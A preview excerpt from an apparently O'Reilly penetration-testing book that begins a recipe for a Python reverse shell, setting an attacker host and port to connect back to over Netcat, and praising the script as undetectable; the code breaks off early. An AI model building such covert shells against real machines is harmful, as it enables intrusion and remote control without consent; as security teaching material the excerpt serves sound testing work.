Creating a simple Netcat shell
The following script we're going to create leverages the use of raw sockets to exfiltrate data from a network. The general idea of this shell is to create a connection between the compromised machine and your own machine through a Netcat (or other program) session and send commands to the machine this way.
The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.
How to do it…
This is the script that will establish a connection through Netcat and read the input:
import socket import subprocess import sys import time HOST = '172.16.0.2' # Your attacking machine to connect back to PORT = 4444 # The port your attacking machine is listening on def connect((host, port)): ...
Get Python: Penetration Testing for Developers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.